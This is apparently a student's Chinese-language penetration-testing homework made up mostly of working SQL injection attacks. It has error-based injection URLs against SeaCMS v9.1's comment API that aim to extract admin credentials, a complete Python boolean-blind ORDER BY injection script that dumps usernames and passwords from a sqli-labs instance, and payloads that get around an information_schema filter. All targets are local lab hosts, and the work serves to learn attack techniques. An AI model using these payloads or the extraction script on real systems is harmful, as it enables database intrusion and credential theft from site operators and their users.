渗透第二次作业
1、seacmsv9报错注入出管理员账号密码
注入漏洞的文件路径:seacmsv9.1\upload\comment\api\index.php
注入点:&$rlist
经源代码分析,可用以下语句注入,得到用户名:
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20user()))),@`%27`
用以下语句注入出数据库名:
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20database()))),@`%27`
用以下语句注入出表名:
http://127.0.0.1/seacmsv9.1/upload/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%23%0atable_name%20from%23%0ainformation_schema.tables%20where%20table_schema%20=0x736561636d73%20limit%200,1))),@`%27`
结果注入失败
2、orderby的布尔盲注
布尔盲注:
import requests
from lxml import html
def get_id_one(URL, paload):
    """Send one probe request and return the text of the first table cell.

    Args:
        URL: endpoint to query (the sqli-labs page set in ``__main__``).
        paload: dict of query parameters; every caller passes a single
            ``"sort"`` key.

    Returns:
        The stripped text of ``//table//tr[1]/td[1]`` in the response. The
        callers compare it against ``"1"`` and use that as a yes/no oracle.

    Raises:
        IndexError: the response has no matching table cell (the ``[0]``
            on an empty XPath result). Network errors propagate from
            ``requests``.
    """
    # No timeout is given, so a stalled server blocks the caller.
    res = requests.get(url=URL, params=paload)
    tree = html.fromstring(res.content)
    # Whichever row sorts first decides the oracle answer.
    id_one = tree.xpath('//table//tr[1]/td[1]/text()')[0].strip()
    return id_one
# 获取数据库名
def database(URL):
    """Recover the current schema name with a boolean-based blind probe.

    The server interpolates ``sort`` into ORDER BY, so the ``if(...)``
    chooses ``id`` or ``username`` as the sort column and the first row
    reveals whether the probed character code is <= ``mid``. One binary
    search over 32..127 is run per position, for positions 1..9.
    Server-side fix: never interpolate a sort parameter; map it onto a
    fixed whitelist of column names instead.

    Args:
        URL: target endpoint, passed through to ``get_id_one``.

    Prints the recovered name; returns ``None``.
    """
    dataname = ""
    for i in range(1, 10):  # 9 positions; longer names are truncated
        low = 32
        hight = 128  # exclusive upper bound
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            # greatest(ascii, mid) == mid  <=>  ascii <= mid: rows are
            # sorted by id, the first cell is "1", the upper bound drops.
            if id_one == "1":
                hight = mid
                mid = (low + hight) // 2
            else:
                low = mid + 1
                mid = (low + hight) // 2
        # The loop exits with low == hight == mid, the found code point.
        # NOTE(review): past the end of the name every probe answers "yes",
        # so the search converges on 32 and the output is padded with
        # spaces -- confirm against the server.
        dataname += chr(mid)
    print(dataname)
# 获取表名
def table_name(URL):
    """Recover the comma-joined table names of schema ``security``.

    Same ORDER BY oracle as ``database``, but with the opposite polarity:
    the probe asks ``ascii > mid``, so a "1" answer raises the lower bound.
    Positions 1..39 are read; a longer list is truncated.

    Args:
        URL: target endpoint, passed through to ``get_id_one``.

    Prints the recovered string; returns ``None``.
    """
    tables = ""
    for i in range(1, 40):
        low = 32
        hight = 128  # exclusive upper bound
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            # "1" means the character code is strictly above mid.
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here; positions past the end of the string
        # converge on 32 (space) -- NOTE(review): confirm.
        tables += chr(mid)
    print(tables)
# 获取字段名
def column_name(URL):
    """Recover the comma-joined column names of ``security.users``.

    Identical search to ``table_name`` (probe ``ascii > mid``), with the
    schema and table hard-coded in the query and positions 1..24 read.

    Args:
        URL: target endpoint, passed through to ``get_id_one``.

    Prints the recovered string; returns ``None``.
    """
    columns = ""
    for i in range(1, 25):
        low = 32
        hight = 128  # exclusive upper bound
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),id,username) -- "}
            id_one = get_id_one(URL, paload)
            # "1" means the character code is strictly above mid.
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the found code point.
        columns += chr(mid)
    print(columns)
# 获取数据
def datas(URl):
    """Recover ``username>password`` pairs from ``users`` (positions 1..49).

    Same search as ``table_name``. The parameter is spelled ``URl`` but
    the body reads ``URL``, so the argument is ignored and the call only
    works because ``__main__`` defines a module-level ``URL``; calling
    this from another module raises ``NameError``.

    Args:
        URl: unused because of the misspelling above.

    Prints the recovered string; returns ``None``.
    """
    data = ""
    for i in range(1, 50):
        low = 32
        hight = 128  # exclusive upper bound
        mid = (low + hight) // 2
        while (hight > low):
            paload = {
                "sort": f"if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),id,username) -- "}
            # Resolves to the global URL, not the parameter URl.
            id_one = get_id_one(URL, paload)
            # "1" means the character code is strictly above mid.
            if id_one == "1":
                low = mid + 1
                mid = (low + hight) // 2
            else:
                hight = mid
                mid = (low + hight) // 2
        # low == hight == mid here: the found code point.
        data += chr(mid)
    print(data)
if __name__ == '__main__':
    # Local sqli-labs Less-46 instance; the ORDER BY parameter is ``sort``.
    # This module-level URL is also what datas() actually reads, because
    # its own parameter is misspelled ``URl``.
    URL = "http://127.0.0.1/sqlilabs/Less-46/index.php"
    # Each step prints its result; nothing is passed between the calls.
    database(URL)
    table_name(URL)
    column_name(URL)
    datas(URL)
结果:
3、过滤information_schema,如何解决
如果information_schema被过滤掉了,该如何查询数据
方法一:利用sys数据库
查看所有数据库名:
SELECT DISTINCT table_schema FROM sys.schema_table_statistics;
查看数据库中所有表名:
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema = 'seacms';
#sys.schema_auto_increment_columns
#sys.schema_table_statistics_with_buffer
#mysql.innodb_table_stats
#mysql.innodb_table_index
#均可代替 information_schema
方法二:无列名注入
利用 join-using 注列名
获取表名:
?id=-1' union select 1,2,group_concat(table_name)from sys.schema_auto_increment_columns where table_schema=database()--+
获取字段名:
?id=-1' union select * from (select * from users as a join users as b)as c--+
?id=-1' union select * from (select * from users as a join users b using(id,username))c--+
?id=-1' union select * from (select * from users as a join users b using(id,username,password))c--+